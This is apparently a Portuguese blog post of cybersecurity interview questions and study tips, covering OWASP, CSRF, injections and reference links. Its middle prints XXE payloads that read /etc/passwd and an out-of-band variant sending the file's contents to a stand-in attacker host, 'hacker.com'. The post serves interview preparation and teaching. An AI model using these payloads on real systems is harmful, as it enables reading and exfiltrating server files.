
Resumo de perguntas de entrevista de Cyber Security pelas quais passei, espero que ajude
Esta página é um resumo de entrevistas pelas quais passei, cobrindo uma variedade razoável de cargos; recebi várias rejeições, no entanto, aprendi com cada entrevista, coletei feedback construtivo e segui em frente. Espero que estas perguntas/dicas possam ajudar você.
Os cargos que geralmente cobre são os seguintes:
Dica rápida:
Tentei anotar abaixo todas as perguntas possíveis que encontrei e forneci respostas para algumas. As demais você pode pesquisar no Google pelas respostas específicas, se quiser se aprofundar. Além disso, há algumas referências no final; dê uma olhada. Elas foram realmente úteis.
Adoraria adicionar mais perguntas conforme avanço e reviso minhas anotações, no entanto, agradeceria se você pudesse me dar um feedback construtivo sobre isto, entrando em contato comigo via [email protected]. Se você encontrou algo que não está coberto aqui, sinta-se à vontade para compartilhar.
O que é CIA?
O que é AAA?
OWASP Top 10
O que é XSS (Cross-site Scripting)?
O que é CSRF
Esta é a pergunta mais interessante que quase todo entrevistador adoraria fazer
Dica rápida: Seja breve, se for perguntado(a), só então explique a história completa
Cross-Site Request Forgery (CSRF) é um ataque que força um usuário final a executar ações indesejadas em uma aplicação web na qual ele está autenticado no momento. Ataques CSRF visam especificamente solicitações de alteração de estado, não roubo de dados, já que o atacante não tem como ver a resposta à solicitação forjada. Com uma pequena ajuda de engenharia social (como enviar um link por e-mail ou chat), um atacante pode enganar os usuários de uma aplicação web para que executem ações escolhidas pelo atacante. Se a vítima for um usuário comum, um ataque CSRF bem-sucedido pode forçar o usuário a realizar solicitações de alteração de estado, como transferir fundos, alterar seu endereço de e-mail e assim por diante. Se a vítima for uma conta administrativa, o CSRF pode comprometer toda a aplicação web.
Como combater CSRF:
Use Tokens Anti-CSRF
Use a política de mesma origem (same-origin policy)
Uso do cabeçalho Referrer
O que é codificação HTML/URL?
O protocolo HTTP é sem estado (stateless)?
HTTP é inerentemente um protocolo sem estado, porém o servidor usa cookies para torná-lo com estado (stateful)
Quais são os tipos de injeções: SQL, Command, OS
Como combater injeções SQL
Use consultas parametrizadas (parameterized queries) e procedimentos armazenados (stored procedures)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>
Para ser injetado: document.xml
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://hacker.com/evil.dtd">
%remote; %intern; %xxe;
]>
<root>&xxe;</root> - you can change xxe entity to general entity
Host externo: http://hacker.com/evil.dtd
<!ENTITY % payl SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd">
<!ENTITY % intern "<!ENTITY % xxe SYSTEM 'http://hacker.com/result-is?%payl;'>">
--- OR ---
<!ENTITY % intern "<!ENTITY % xxe SYSTEM 'file://%payl;'>"> - consider error-based
Falarei em termos gerais sobre AWS, no entanto, existem outros provedores de nuvem, como Azure, GCP, Digital Ocean, etc..
Recurso de Aprendizado:
https://regexone.com/ (Expressões Regulares são obrigatórias!)
https://portswigger.net/web-security/
OWASP Top 10:
https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf
Perguntas de Entrevista Infosec:
https://danielmiessler.com/study/infosec_interview_questions
Principais Perguntas de Pentest:
https://resources.infosecinstitute.com/top-30-penetration-tester-pentester-interview-questions-and-answers-for-2019/#gref
Dicas de Python:
https://www.codementor.io/sheena/essential-python-interview-questions-du107ozr6
Guia do Usuário da AWS:
https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/concepts.html
Visão sobre SMB e Samba:
https://fitzcarraldoblog.wordpress.com/2016/10/17/a-correct-method-of-configuring-samba-for-browsing-smb-shares-in-a-home-network/